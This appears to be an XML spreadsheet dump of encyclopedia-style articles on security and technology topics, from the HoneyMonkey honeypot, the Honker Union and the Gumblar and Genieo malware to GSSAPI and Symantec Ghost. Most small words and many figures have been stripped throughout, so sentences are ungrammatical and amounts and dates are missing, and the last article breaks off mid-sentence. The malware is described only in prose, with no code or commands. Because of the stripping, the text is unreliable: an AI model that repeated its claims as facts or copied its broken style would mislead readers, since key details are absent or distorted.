    <t>honeymonkey, short strider honeymonkey exploit detection system, microsoft research honeypot. implementation uses network computers crawl world wide searching websites browser exploits install malware honeymonkey computer. snapshot memory, executables registry honeypot computer recorded crawling site. after visiting site, state memory, executables, registry recorded compared previous snapshot. changes analyzed determine visited site installed malware onto client honeypot computer.honeymonkey based honeypot concept, difference actively seeks websites exploit term coined microsoft research 2005. with honeymonkeys possible find open security holes publicly known exploited attackers. technology single honeymonkey automated program tries mimic action user surfing net. series honeymonkeys virtual machines running windows various levels patching fully patched, fully vulnerable, others extremes. honeymonkey program records every read write file system registry, thus keeping data collected web-site software installed once program leaves site, analyzed determine malware loaded. cases, actions sent manual analysis external controller program, logs exploit data restarts virtual machine allow crawl sites starting known uninfected state. initiating crawling billion plus pages, many legitimate sites exploit browser vulnerabilities, start crawling sites would waste resources. initial list therefore manually created listed sites known browser vulnerabilities compromise visiting systems malware. honeymonkey system follows links exploit sites, higher probability leading exploit sites. honeymonkey system also records many links point exploit site thereby giving statistical indication easily exploit site reached. exploit detection honeymonkey uses black system detect exploits, i.e., signature browser exploits detect exploits. monkey program, single instance honeymonkey project, launches internet explorer visit site. also records registry file read write operations. monkey allow pop-ups, allow installation software. read write happens internet explorer's temporary folder therefore must used browser exploits. these analyzed malware detection programs manually analyzed. monkey program restarts virtual machine crawl another site fresh state. also client honeypot honeyclient references article technical paper external links security now! podcast episode "honeymonkeys" eweek articles: honeyclient open source client honeypot drives similar honeymonkey honeyc interaction client honeypot framework</t>
  </si>
  <si>
    <t>Honker Union</t>
  </si>
  <si>
    <t>honker (simplified chinese: traditional chinese: pinyin: hóngkè) hacker group known hacktivism, mainly present china. literally name means "red guest", compared usual chinese transliteration hacker (黑客, hēikè, literally black guest black hat). word "honker" emerged 1999, united states bombed chinese embassy belgrade, yugoslavia since then, honkers formed honker union, whose members combined hacking skills nationalism, launched series attacks websites united states, mostly government-related sites. name also suggests hacker red, color communist party, combat hackers dark. following years, honkers remained active hacktivism supporting chinese government view imperialism united states militarism japan. group currently merged hacker alliance. media coverage while honker union directly related hong kong, fact honker also mean hongkongers caused confusion media. january 2003, "worm" slammer appeared internet. proof concept exploit code server utilised slammer, written david litchfield, found honker union website, speculated worm spread honker union. associated press misstated honker might hong kong hacking group, possibly aforementioned naming confusion. though mistake, honker union since falsely connected hong kong many documents. relationship chinese government although evidence chinese government oversights group, official government stance cyber crime kind, honker union freelance chinese hackers complex relationship chinese government. greg walton noted studies chinese government able honker union "proxy force" beijing's political goals converge group's nationalist sentiment. also noted instances members profited chinese government skills chinese government recruited members security military forces. finally, greg walton pointed calls within group officially recognized integrated chinese government. attacks honker union sino-iran hacker after chinese website baidu hacked iranian cyber army 2010, chinese hackers claiming members honker union began retaliating attacks iranian websites. iranian educational website iribu.ir hacked. first iribu.ir home page turned black screen, words "long live people's republic china" appeared. numerous iranian governmental websites also attacked. attack philippines after 2010 rizal park hostage-taking incident, bulacan provincial government's website attacked chinese hackers. sino-vietnamese hacker south china disputes china vietnam worsened 2011, numerous chinese website attacked vietnamese hackers, displaying vietnamese nationalist slogans "vietnamese hackers best", "vietnamese people willing sacrifice protect sea, nation" etc. honker union retaliated attacks reportedly "more thousand vietnamese websites", displaying chinese national flag nationalist slogans homepages. sino-philippines hacker april 2014, scarborough shoal standoff triggered so-called "hacker war" china philippines. numerous chinese websites, including cyol.net v.cyol.com five others, came attack philippine hackers. chinese hackers also attacked homepage university philippines, turning disputed scarborough shoal, along slogans come from china" "huangyan island ours".(huangyan island chinese name scarborough shoal) tsering woeser 2008, tibetan writer/blogger political dissident tsering woeser, reported cyber-attack skype email accounts impersonated, also website hacked. this attack claimed honker union. attacks japanese websites after japanese government announced plan purchase senkaku islands (called diaoyu islands china), honker union denounced move called declaration war. they listed japanese entities targets. weeks that, japanese central local governments, banks, universities, companies experienced various cyber attacks. these attacks include defacing websites distributed denial service (ddos) attacks. also dark visitor hacker alliance redhack (from turkey) references external links honker union china</t>
  </si>
  <si>
    <t>Hotfile</t>
  </si>
  <si>
    <t>hotfile one-click file hosting website founded hotfile corp 2006 panama city, panama. december 2013, hotfile ceased operations, signing million settlement motion picture association america (mpaa); settlement previously misreported million. usage hotfile allowed users upload download files browser. non-registered users allowed upload once. after successful file upload, user given unique allowed others download file. non-registered users wait seconds download queue might needed enter captcha wait minutes download another file previous download session ended (even file download completely). hotfile provide search engine browser. site offered different languages including arabic, bulgarian, czech, types chinese, dutch, german, english, french, hungarian, italian, japanese, polish, portuguese, romanian, russian, spanish, serbian turkish. features service link checker users could enter file urls order check current availability. there also hotlink feature, allowed users directly link files additional fee. terms privacy policy hotfile service provider digital millennium copyright act, u.s.c. ("dmca"). hotfile responded claims copyright infringement reported designated copyright agent. hotfile's privacy policy 'usage data' section stated automatically collect usage information...type browser use, operating system, internet service provider, address, links use, time duration service...be aware, however, required disclose information address could used others attempt identify you." copyright-related lawsuits february 2011, hotfile alleged owner anton titov foreign national residing florida) sued mpaa behalf disney enterprises, 20th century fox, universal studios, columbia pictures, warner bros. alleging direct secondary copyright infringement. because site charged membership fees premium service, mpaa argued hotfile "profits richly paying nothing studios" allegedly infringing files.google argued amicus brief hotfile benefit protections youtube enjoys, arguing "hotfile exactly dmca demands, plaintiffs’ takedown notices cannot used charge service knowledge allegedly infringing material notices specifically identify."the direct copyright infringement claims thrown judge adalberto jordan july 2011, leaving secondary liability allegations decided.the secondary liability part lawsuit likely proceed light inducement rule decided supreme court studios grokster. 2012, movie studios argued hotfile's business model identical megaupload, shut government, asked summary judgement.a summary judgement granted judge kathleen williams august 2013, finding hotfile vicariously liable actions users; also found titov personally liable. judge williams also denied defendants interlocutory appeal matter vicarious liability (meaning would appeal final verdict case). however williams grant summary judgement hotfile's liability inducement contributory infringement. this later part trial scheduled begin jury trial december 2013, settlement reached early december, resulting site's closure. countersuit warner brothers september 2011 company filed counterclaim accusing movie studio warner bros. fraud abuse. according complaint, warner systematically misused copyright infringement takedown tool (sra) hotfile built them. hotfile alleges warner willingly taken files without holding copyrights, game demos even open-source software inappropriate takedowns continued even movie studio repeatedly notified false claims.the electronic frontier foundation filed amicus brief countersuit, arguing automated systems used warner illegal.warner admitted errors takedown notices, however refuted claims, saying legitimate; case open-source software argued "had posted alongside infringing warner content order facilitate rapid downloading infringing warner content" permission relevant copyright owners remove gaming software question. furthermore, warner rejected eff's claims dmca prohibits automated systems like used. warner claimed less one-tenth percent notices sent hotfile (890 almost million) truly erroneous.this countersuit survived august 2013 summary judgement, december 2013 settlement (see below) ended countersuit well. settlement closure december 2013, hotfile ceased operations, signing million settlement motion picture association america (mpaa). shutdown preceded ruling judge august year site owner, anton titov, lost safe harbor protection dmca "because actively encouraged infringement", consequently could held liable actions users.before closure, hotfile accounted approximately billion downloads. although received approximately million dmca takedown notices, hotfile terminated user accounts, according judge's august findings. references</t>
  </si>
  <si>
    <t>Hummingbad</t>
  </si>
  <si>
    <t>hummingbad android malware, discovered check point february 2016.in july 2016, researchers security firm check point software said malware installs 50,000 fraudulent apps day, displays million malicious advertisements, generates $300,000 month revenue. research pointed yingmob group, previously accused responsible yispecter malware, responsible attack.lookout claimed hummingbad malware also part shedun family, however, claims refuted. also references</t>
  </si>
  <si>
    <t>Huobi</t>
  </si>
  <si>
    <t>huobi (chinese: 火币网; pinyin: huǒbìwǎng) seychelles-based cryptocurrency exchange. founded china, company offices hong kong, south korea, japan united states. august 2018 became publicly listed hong kong company.following 2017 bitcoin exchanges chinese government, huobi stopped bitcoin withdrawals. huobi china continues operate blockchain consulting research platform. march 2018, huobi processed around billion trades daily. history huobi founded 2013 leon (chinese: pinyin: lín). alumnus tsinghua university, computer engineer oracle founding huobi.on 2013, huobi group (火币集团) acquired huobi.com domain. august huobi launched simulation trading platform, september bitcoin trading platform launched.in november 2013, huobi received angel investments zhikang zhen fund. 2014, huobi raised million venture capital investment sequoia capital. august 2014, huobi acquired bitcoin wallet provider quick wallet.in december 2013, trading volume exceeded billion yuan, making huobi china's largest digital asset trading platform time. june 2016, total transaction volume reached trillion rmb, november 2016 trillion yuan, accounting global bitcoin exchange market. december 2016, daily transaction volume surpassed billion yuan.in september 2014, huobi announced official weibo account bitcoin 8,100 litecoin wrongly deposited different accounts. firm returned lost cryptocurrency.in august 2017 huobi okcoin controversially invested billion yuan ($150 million) idle client funds wealth-management products.in september 2017, chinese government banned initial coin offerings (icos) trading domestic cryptocurrency exchanges, rendering many people's holdings effectively worthless, including users huobi's exchange. response, huobi adjusted business organizational structure promote global expansion. october 2017, huobi officially expanded korea headquarters seoul, south korea, opened trading march 2018. november 2017, launched operations singapore total volume first month exceeding billion rmb. december 2017, launched office tokyo, japan announced would crypto exchanges japan early 2018, partnership japanese financial group group. march 2018, huobi announced launching united states. august 2018, reverse takeover, huobi acquired stake hong kong electronics manufacturer pantronics holdings, becoming listed hong kong stock exchange. november 2020, huobi launches huobi labuan realize regulated crypto exchange malaysia.in september 2021, huobi announced would stop serving customers mainland china regulations.in 2022, announced huobi acquired latin american crypto platform, bitex. research partnerships april 2015, huobi partnered tsinghua university "digital asset research initiative", sponsored "digital asset research project" internet finance laboratory wudaokou tsinghua school finance.on july 2016, huobi network blockchain research center published report, "blockchain: defining financial economic future". december 2016, huobi joined fintech digital asset alliance (shenzhen) along fintech research institute china guidance shenzhen municipal government. references</t>
  </si>
  <si>
    <t>HEAT LANrev</t>
  </si>
  <si>
    <t>heat lanrev (formerly absolute manage) systems lifecycle management software used system administrators automate administration tasks. product includes server client ("agent") software runs windows macos. history vancouver-based absolute acquired lanrev pole position software december 2009, us$12.1 million cash 500,000 shares absolute's common stock. lanrev rebranded absolute manage february 2010. july 2015, absolute announced intention divest absolute manage. sale absolute manage heat software completed october 2015, us$11.0 million, product renamed heat lanrev. school webcam controversy 2010 robbins lower merion school district case, plaintiffs charged suburban philadelphia high schools secretly spied students surreptitiously remotely activating webcams embedded school-issued laptops students using home, therefore infringed privacy rights. schools admitted secretly snapping 66,000 webshots screenshots, including webcam shots students bedrooms.lanrev software used lower merion school district's student laptop program, overseen network technician michael perbix. february 2010, perbix administrators district accused using software take undisclosed unauthorized photographs students webcams macintosh laptops. lawsuit brought parents 15-year-old sophomore, blake robbins, allegedly accused illicit behavior seen computer's webcam bedroom. photographs, taken laptop reported stolen, allegedly used evidence disciplinary action. investigated incident, philadelphia federal judge intervened sort issues relating lawsuit. perbix previously praised theft track, name feature lets administrators remotely photograph potential thieves computer reported stolen, noting youtube video produced that: it’s excellent feature. yes, used yes, gleaned results itself, fantastic feature trying to—especially you’re school environment laptops you’re worried about, know, laptops getting missing. i’ve actually laptops thought stolen actually still classroom, misplaced, time found back, turn tracking off. had, know, good twenty snapshots teacher students using machines classroom. lanrev's owner, absolute software denounced software illegal purpose, emphasizing theft recovery left enforcement professionals. they denied knowledge complicity either perbix's school district's actions. absolute stated next update lanrev would permanently disable theft track. references external links official website</t>
  </si>
  <si>
    <t>H*Commerce</t>
  </si>
  <si>
    <t>h*commerce: business hacking six-part online documentary film series directed seth gordon. centers struggle criminal hackers security experts. each segment five eight minutes length. first released internet 2009."h*commerce" stands "hacker commerce", specifically "the business making money illegal technology compromise personal business data," according mcafee. synopsis main narrative follows story sweet home, oregon resident janella spears, falls victim elaborate nigerian scam. initiated e-mail, scammers promise spears family return dead relative's lost fortune. interested family's genealogy persuaded death certificate purported relative's, spears eventually loses us$440,000.the series also features denver, colorado-based computer forensics expert chris roberts, provides counseling technical support spears family deal emotional challenges brought mounting debt, well resultant anger distrust.roberts also demonstrates open wireless network provide criminal data necessary commit identity fraud, among internet crimes, surreptitiously access bluetooth-enabled devices surrounding cars crowded freeway. themes series focuses growing threat cybercrime explores evolution computer hacking phone phreaking multibillion-dollar criminal industry targets individuals tools botnets ddos attacks. series also explores hacking-related topics malware, site scraping spear phishing. also focuses online safety education safe shopping.apple cofounder steve wozniak makes appearance well talk phone phreaking days, phreaking pioneer john "captain crunch" draper. film, wozniak explains hackers phreakers originally maintained strong ethic, using techniques "rip people make money" explore". draper observes imprisonment hackers unintended side-effects: "once busted, tell everybody else jail cat's bag. next thing know, technology."according mcafee, americans lost total almost $8.5 billion internet-enabled crimes 2007 2008. production h*commerce produced antivirus software maker mcafee part campaign educate consumers online security threats. gordon, best known four christmases king kong: fistful quarters, hired direct. series shot hd.the project originally conceived series standalone episodes, highlighting different aspect online crimes, including phishing, bank scraping, e-mail scams. however, pre-production research, gordon identified spears example typical internet users vulnerable criminals, decided make focus entire series.millam stated: produced web-based film make cybercrime real people, help consumers understand need take precautions. days hackers small group thrill-seekers breaking computers gain fame notoriety behind now, hacking profit, call h*commerce, global industry. distribution marketing promotion film, site appears, conducted primarily online banner trailers well social media mobile campaign. york francisco, mcafee conducted poster campaign featuring artwork similar created saul bass alfred hitchcock francisco graphic designer, nicole flores.the film's website also offers additional resources learn cybercrime online safety, well mcafee's cybercrime response unit, free service consumers believe victim cybercrime. references external links stop h*commerce official site archived 2021-12-18 wayback machine</t>
  </si>
  <si>
    <t>Gumblar</t>
  </si>
  <si>
    <t>gumblar malicious javascript trojan horse file redirects user's google searches, installs rogue security software. also known troj/jsredir-r botnet first appeared 2009. infection windows personal computers gumblar.x infections widely seen systems running newer macos operating systems. visitors infected site redirected alternative site containing malware. initially, alternative site gumblar.cn, since switched variety domains. site sends visitor infected opened visitor's browser acrobat reader. exploit known vulnerability acrobat gain access user's computer. newer variations gumblar redirect users sites running fake anti-virus software. virus find clients filezilla dreamweaver download clients' stored passwords. gumblar also enables promiscuous mode network card, allowing sniff local network traffic details. first viruses incorporate automated packet analyzer. servers using passwords obtained site admins, host site access website infect website. download large portions website inject malicious code website's files uploading files back onto server. code inserted file contains &lt;body&gt; tag, html, php, javascript, aspx files. inserted code contains base64-encoded javascript infect computers execute code. addition, pages inline frames inserted them. typically, iframe code contains hidden links malicious websites. virus also modify .htaccess hosts files, create images.php files directories named 'images'. infection server-wide exploit. infect sites server passwords gumblar variants different companies different names gumblar variants. initially, malware connecting gumblar.cn domain server shut 2009. however, many badware variants emerged connect malicious servers iframe code. gumblar resurfaced january 2010, stealing usernames passwords infecting html, javascript files webservers help spread itself. this time used multiple domains, making harder detect/stop. also e-mail spam malware references external links staff 2009). "new computer virus rise, warn security experts". telegraph (london). archived original 2009. retrieved 2009-07-07. leyden, john 2009). "gumblar google-poisoning attack morphs". register. retrieved 2009-07-07.</t>
  </si>
  <si>
    <t>Gemini (company)</t>
  </si>
  <si>
    <t>gemini trust company, (gemini) cryptocurrency exchange custodian allows customers buy, sell, store digital assets. founded 2014 cameron tyler winklevoss. currently, operates united states, canada, united kingdom, south korea, hong kong, singapore. history tyler cameron winklevoss announced gemini june 2013 company went live october 2015. gemini began order facilitate purchase storage bitcoin complex system private keys password protected environments. gemini holds limited purpose trust charter york department financial services granted october 2015. gemini began adding financial services offers thereafter, include support. 2016 governor andrew cuomo york state announced approval gemini first licensed ethereum exchange based united states. additionally, 2016, gemini announced would allow users withdraw ethereum classic (etc) exchange, following hard fork ethereum's code.in october 2017, gemini announced allowing registered users withdraw bitcoin cash exchange provided balance available exchange prior bitcoin hard fork august 2017.in december 2017, chicago board options exchange (cboe) began gemini settle bitcoin futures contracts. cboe partnered gemini gemini's dollar denominated auction price contracts. march 2019, cboe announced would stop listing bitcoin futures.in april 2018, gemini began offering "block trading". block trading enables gemini users sell large quantities digital assets outside gemini's continuous order books, creating additional liquidity mechanism trading greater size. also april, gemini began utilize nasdaq's smarts technology monitor trades combat fraudulent activity price manipulation exchange. 2018, york department financial services announced approved gemini offer zcash (zec) platform, becoming first licensed exchange offer trading custody services september 2018, gemini received regulatory approval product, gemini dollar (gusd) nydfs would launch trading coin day. gemini described product stablecoin maintains 1-to-1 american dollar. october 2018 announced gemini obtained digital asset insurance covering tokens coins held exchange. insurance brokered aon, london based public risk consulting company, underwritten consortium global underwriters.in 2020, partnership announced samsung whereby samsung smartphone users could link samsung blockchain wallets gemini accounts view balances transfer crypto.in november 2021 gemini raised $400 million investment values york parent company, gemini space station, llc, $7.1 billion.on june 2022, commodity futures trading commission (cftc) filed suit gemini based alleged misrepresentation company's exchange futures contracts 2017 meetings cftc. suit seeking block gemini, well affiliates, trading commodities getting investments, addition monetary fines. also june cameron tyler winklevoss announced would laying company staff, citing "contraction phase, known "crypto winter" cryptocurrency industry. nfts november 2019, gemini trust bought nifty gateway undisclosed sum. nifty gateway marketplace nfts. goal marketplace custodian various assets, including property deeds, passports, commodities, collectibles, videogame characters, movies, music event tickets. service disruptions site's primary challenge remaining online times excessively high volumes, relatively common occurrence website receiving unusual amount traffic. november 2017, example, gemini coinbase crashed several hours. gemini showing "504 gateway time-out" message, status page showed "systems currently experiencing degraded performance." subsequently, gemini blog offered comment. "this first scaling challenge we’ve encountered, won’t last. we’re continuing improve performance infrastructure monitoring anticipate potential problems quickly future." references external links gemini website</t>
  </si>
  <si>
    <t>Generic Security Services Application Program Interface</t>
  </si>
  <si>
    <t>generic security service application program interface (gssapi, also gss-api) application programming interface programs access security services. gssapi ietf standard addresses problem many similar incompatible security services today. operation gssapi, itself, provide security. instead, security-service vendors provide gssapi implementations usually form libraries installed security software. these libraries present gssapi-compatible interface application writers write application vendor-independent gssapi. security implementation ever needs replacing, application need rewritten. definitive feature gssapi applications exchange opaque messages (tokens) hide implementation detail higher-level application. client server sides application written convey tokens given respective gssapi implementations. gssapi tokens usually travel insecure network mechanisms provide inherent message security. after exchange number tokens, gssapi implementations ends inform local application security context established. once security context established, sensitive application messages wrapped (encrypted) gssapi secure communication client server. typical protections guaranteed gssapi wrapping include confidentiality (secrecy) integrity (authenticity). gssapi also provide local guarantees identity remote user remote host. gssapi describes procedure calls. significant ones include: gss_acquire_cred obtains user's identity proof, often secret cryptographic gss_import_name converts username hostname form identifies security entity gss_init_sec_context generates client token send server, usually challenge gss_accept_sec_context processes token gss_init_sec_context generate response token return gss_wrap converts application data secure message token (typically encrypted) gss_unwrap converts secure message token back application datathe gssapi standardized (rfc 2744) language. java implements gssapi jgss, java generic security services application program interface.some limitations gssapi are: standardizing authentication, rather authorization too; assuming client–server architecture.anticipating security mechanisms, gssapi includes negotiating pseudo mechanism, spnego, discover mechanisms present original application built. relationship kerberos dominant gssapi mechanism implementation kerberos. unlike gssapi, kerberos standardized various existing implementations incompatible apis. gssapi allows kerberos implementations compatible. related technologies radius sasl sspi spnego rpcsec concepts name binary string labels security principal (i.e., user service program) access control identity. example, kerberos uses names like user@realm users service/hostname@realm programs. credentials information proves identity; used entity named principal. credentials typically involve secret cryptographic key. context state authenticating/authenticated protocol. provide message protection services, used compose secure channel. tokens opaque messages exchanged either part initial authentication protocol (context-level tokens), part protected communication (per-message tokens) mechanism underlying gssapi implementation provides actual names, tokens credentials. known mechanisms include kerberos, ntlm, distributed computing environment (dce), sesame, spkm, lipkey. initiator/acceptor peer sends first token initiator; acceptor. generally, client program initiator server acceptor. history july 1991: ietf common authentication technology (cat) working group meets atlanta, john linn september 1993: gssapi version (rfc 1508, 1509) 1995: windows 3.51 released, includes sspi june 1996: kerberos mechanism gssapi (rfc 1964) january 1997: gssapi version (rfc 2078) october 1997: sasl published, includes gssapi mechanism (rfc 2222) january 2000: gssapi version update (rfc 2743, 2744) august 2004: kitten working group meets continue activities 2006: secure shell gssapi standardised (rfc 4462) also pkcs references external links 2743 generic security service version update 2744 generic security service version c-bindings 1964 kerberos gss-api mechanism 4121 kerberos gss-api mechanism: version 4178 simple protected gss-api negotiation mechanism (spnego) 2025 simple public-key gss-api mechanism (spkm) 2847 lipkey infrastructure public mechanism using spkm "common authentication technology next generation (kitten)". internet engineering task force. september 2013. microsystems (2002). "gss-api programming guide solaris oracle corporation. oracle corporation (2020). "writing applications that gss-api oracle solaris 11.4, developer's guide security".</t>
  </si>
  <si>
    <t>Genie Backup Manager</t>
  </si>
  <si>
    <t>genie backup manager, developed genie-soft inc, backup software microsoft windows operating systems back restore whole system (operating system, applications, documents, e-mails, settings, files/folders, etc.) many local remote devices including internal external hard disks, iomega disks, locations, online, across network, removable media. software interfaces, "normal" interface "simple" interface, appealing appearance fewer advanced options. software permits backups standard .zip files proprietary format, latter includes encryption option. optional supplementary piece software permits backups open files. criticism backup platform different names owner, muayyad (mo) fahed shehadeh. example, zoolz, bigmind polarbackup popular. this company history offering cheap "lifetime" backups renege later. instead offering transfer another platform, even sells backup service, send emails apologize encourage customer purchase another premium plan billed monthly. they provide complete refund purchased "lifetime" backup plan within last days. understood many feel forced already information backed genie. years, trying warn others company practices. many consider bait switch. others describe "fraud" "scam." also list backup software references reviewspc world magazine, june 2006 magazine march 2008 external links official website</t>
  </si>
  <si>
    <t>Genieo</t>
  </si>
  <si>
    <t>genieo innovation israeli company, specializing unwanted software includes advertising user tracking software, commonly referred potentially unwanted program, adware, privacy-invasive software, grayware, malware. they best known genieo, application type. they also operate installmac distributes additional 'optional' search modifying software applications. 2014, genieo innovation acquired million somoto, another company "bundles legitimate applications offers additional third party applications unwanted user". this sector israeli software industry frequently referred download valley. history genieo innovation founded april 2008 tzvi jacob tenenboem. first version genieo released september 2009, beta version launched demo2010 conference march 2010.genieo's website suspected changed name inkeepr. overview software installs onto computers makes almost impossible users remove hijacks user's browser tracks browser usage intention mining information. users complain acts like virus need special programs remove malware issues genieo listed malware apple inc.'s xprotect anti-malware service, built macintosh computers running snow leopard later.in 2013, malicious installer, distributed genieo partner softonic, found security software company intego. installer masquerades necessary update adobe flash player attempts install genieo.app without user interaction. dynamic libraries added safari browser, intercept searches intended bing google.other versions genieo also offered 'codecs' required video playback. testing carried genieo june 2013 found left active software behind even using supplied uninstaller, required detailed manual removal.in november 2013, another fake application installer reported include genieo adware. january 2014, sophos added genieo threat list; category viruses spyware trojan horse (computing) adware november 2014, genieo flagged intego (mentioned above) and, according analysis virustotal, (out surveyed) anti-malware solutions, including ad-aware, avast!, bitdefender, comodo, web, eset, fortinet, f-secure, kaspersky, trend micro housecall, sophos symantecin july 2014, genieo acquired million somoto, another company "bundles legitimate applications offers additional third party applications unwanted user."in august 2015, malware researchers discovered genieo installer acquired access keychain, automated click "allow", permission dialog keychain displayed. code safari browser extension added genieo, also contained, immediately used, earlier versions installer. genieo case became impetus rapid emergence similar adware: only search, macshop ads, macvx, etc. also spyware personalization adaptive hypermedia behavioral targeting references</t>
  </si>
  <si>
    <t>Geo-fence warrant</t>
  </si>
  <si>
    <t>geo-fence warrant (also known geofence warrant reverse location warrant) search warrant issued court allow enforcement search database find active mobile devices within particular geo-fence area. courts granted enforcement geo-fence warrants obtain information databases google's sensorvault, collects users' historical geolocation data. geo-fence warrants part category warrants known reverse search warrants. history geo-fence warrants first used 2016. google reported received warrants 2018, 8,396 2019, 11,554 2020. 2021 transparency report showed data requests enforcement google geo-fence data requests. google common recipient geo-fence warrants main provider data, although companies including apple, snapchat, lyft, uber also received warrants. legality united states some lawyers privacy experts believe reverse search warrants unconstitutional fourth amendment united states constitution, protects people unreasonable searches seizures, requires search warrants specific apply. fourth amendment specifies warrants issued "upon probable cause, supported oath affirmation, particularly describing place searched, persons things seized." some lawyers, legal scholars, privacy experts likened reverse search warrants general warrants, made illegal fourth amendment.groups including electronic frontier foundation opposed geofence warrants amicus briefs filed motions quash orders disclose geofence data. also dragnet (policing) references</t>
  </si>
  <si>
    <t>Ghost (disk utility)</t>
  </si>
  <si>
    <t>ghost acronym general hardware-oriented system transfer) disk cloning backup tool originally developed murray haszard 1995 binary research. technology acquired 1998 symantec. backup recovery functionality replaced symantec system recovery (ssr), although ghost imaging technology still actively developed available part symantec ghost solution suite. history binary research developed ghost auckland, zealand. after symantec acquisition, functions (such translation languages) moved elsewhere, main development remained auckland october 2009 time much moved india.technologies developed 20/20 software integrated ghost acquisition symantec april 2000. ghost first versions ghost supported cloning entire disks. however, version 3.1, released 1997 supports cloning individual partitions. ghost could clone disk partition another disk partition image file. ghost allows writing clone image second disk machine, another machine linked parallel network cable, network drive, tape drive. ghost version ghost added multicast technology, following lead competitor, imagecast. multicasting supports sending single backup image simultaneously machines without putting greater stress network sending image single machine. this version also introduced ghost explorer, windows program supports browsing contents image file extract individual files explorer subsequently enhanced support adding deleting files image fat, later ext2, ext3 ntfs file systems. until 2007, ghost explorer could edit ntfs images. ghost explorer could work images older versions slowly; version images contain indexes find files rapidly. version also moved real-mode protected mode. additional memory available allows ghost provide several levels compression images, provide file browser. 1998, ghost supports password-protected images. ghost (ghost 2000) version moved protected mode. unlike text-based user interface earlier versions, uses graphical user interface (gui). binary research logo, stars revolving around other, plays main screen program idle. 1998, gdisk, script-based partition manager, integrated ghost. gdisk serves role similar fdisk, greater capabilities. ghost netware norton ghost version novell netware (called 2.0), released around 1999, supports partitions (although runs dos, like others). ghost (ghost 2001) ghost 6.0, released 2000, includes management console managing large numbers machines. console communicates client software managed computers allows system administrator refresh disk machine remotely. dos-based program, ghost requires machines running windows reboot ghost requires separate partition used console. ghost ghost 2002 released march 2001, norton ghost version (retail) marketed norton ghost 2002 personal edition. ghost released december 2001, ghost creates virtual partition, partition actually exists file within normal windows file system. this significantly eased systems management user longer partition tables. ghost write images cd-r discs. later versions write dvds. symantec ghost ghost directly windows. well-suited placement bootable media, bartpe′s bootable corporate edition supports unicast, multicast peer-to-peer transfers tcp/ip. ghost supports ntfs file system, although ntfs accessible program. transition off-line version ghost, runs bootable media place installed operating system, originally faced number driver support difficulties limitations increasingly obsolete 16-bit environment. driver selection configuration within non-trivial beginning, limited space available floppy disks made disk cloning several different disk controllers difficult task, different scsi, usb, cd-rom drives involved. mouse support possible often left limited space drivers floppy disk. some devices often work using newer features 2.0, instead operating speeds taking hours taken minutes. widespread support went decline, became increasingly difficult hardware drivers newer hardware. disk imaging competitors ghost dealt decline moving recovery environments freebsd, linux windows draw current driver development able image newer models disk controllers. nevertheless, version ghost compatible hardware configurations works much faster *nix based image backup tools. ghost later windows programs; such, windows bartpe hiren's bootcd plug play hardware drivers standard desktop computer, making hardware support ghost much simpler. norton ghost 2003 norton ghost 2003, consumer edition ghost, released september 2002. available independent product, norton ghost 2003 also included component norton systemworks 2003 professional. simpler, non-corporate version ghost, norton ghost 2003 include console windows front-end script ghost operations create bootable ghost diskette. machine still needs reboot virtual partition, user need interact dos. symantec deprecated liveupdate support norton ghost 2003 early 2006. symantec ghost solution suite (ghost 8.2) released november 2004, symantec renamed enterprise version ghost symantec ghost solution suite 1.0. this helped clarify difference consumer business editions product. according symantec, symantec ghost norton ghost separate product lines based around different technologies developed different teams. this defined february 2006, release norton save restore (also known norton backup restore), standalone backup application based ghost 10.0. symantec ghost solution suite (ghost 8.3) ghost solution suite bundle updated version ghost, symantec client migration user data settings migration tool) former powerquest equivalent, deploycenter (using images). ghost solution suite released december 2005. create image file larger ghost earlier, image files automatically split segments, segment maximum size gb.) other features include comprehensive manufacturing tools, ability create "universal boot disk". acquisition powerquest 2003, symantec acquired largest competitor disk-cloning field, powerquest. august 2004, norton ghost released consumer version ghost, based powerquest's drive image version provides live imaging windows system. ghost continues leverage powerquest file format, meaning backward compatible previous versions ghost. however, version ghost included ghost recovery disk support existing ghost customers. norton ghost (includes ghost 2003) ghost released august 2004. represents significant shift consumer product line ghost 2003, several ways: uses totally different code base, based driveimage/v2i protector product symantec's acquisition powerquest. windows program must installed target system. images made windows running, rather booted directly mode. incremental images (containing changes since last image) supported. requires product activation order function fully. bootable environment ghost useful recovery existing backups. cannot used create images.since ghost support older .gho format disk images, separate containing ghost 2003 included retail packaging users needing access older images. limitations ghost compared ghost 2003 well-communicated symantec, resulted many dissatisfied customers purchased ghost expecting previous version's features (like making images bootable ghost environment, installation required, product activation). norton ghost 10.0 supports creating images cds, dvds, iomega disks well ieee 1394 (firewire) mass storage devices. supports encrypting images maxtor external hard disk drives maxtor onetouch buttons. ghost 10.0 compatible previous versions, future versions. norton save restore (ghost 10.0) norton save restore 1.0, released february 2006, renamed consumer version ghost. used ghost 10.0's engine, addition features allow backup restoration individual files. symantec ghost solution suite (ghost 11.0) ghost solution suite released november 2006. this version provides significant improvements performance, well ability edit ntfs images. this version also adds support windows vista, versions windows, guid partition table (gpt) disks. however, software fully support systems extensible firmware interface (efi) firmware. ghost 11.0 supports saving restoring native ghost image format (.gho, .ghs) images (.img, .raw). norton ghost 12.0 ghost 12.0 includes windows vista support updated thorough user interface. supports full system backup individual files folders backup. this version provides "lightsout restore" feature, restores system on-disk software recovery environment similar windows thereby allowing recovery without bootable upon system startup, menu asks whether start operating system lightsout recovery environment. lightsout restore would augment image, comes ghost. latter contains recovery environment recover system without working operating system. norton save restore (ghost 13.0) fewer features comparison norton ghost offers one-time backups, file folder backup, simplified schedule editor, maxtor onetouch integration modifiable symantec recovery disc. this version supports 32-bit 64-bit versions windows vista. norton ghost 14.0 version 14.0 uses volume snapshot service (vss) make backups store backups site. ghost connect threatcon, symantec service monitors malware activity around world, performs incremental backups specific threat level reached. other features include ability back network-attached storage devices support ntfs partitions 16tb. ghost manage installations version 12.0 later across network. this version longer supports opening .gho image files. stores images .v2i format. incremental backup images created norton ghost saved .iv2i filename extensions alone original full backup (with .v2i filename extension) regular basis. older .gho image files restored using ghost explorer, separate utility. symantec ghost solution suite (ghost 11.5) ghost software enterprise, including ghost 11.5, released 2008. features include: january 2010, latest build live update 11.5.1.2266 (live update (lu5)). this updates ghost solution suite 2.5.1 provides support windows windows server 2008 furthermore, ghost 11.5 compatible bartpe's bootable using builder plug-in symantec ghost norton ghost 15.0 according norton community symantec's site, following features available norton ghost symantec ghost solution suite (ghost 12.0) ghost software enterprise, including ghost 12.0 deployment solution 6.9, announced march 2015. symantec ghost solution suite (ghost 12.0) ghost software enterprise, including ghost 12.0 deployment solution 6.9, released march 2016. symantec ghost solution suite (ghost 12.0) ghost software enterprise, including ghost 12.0 deployment solution 6.9, released 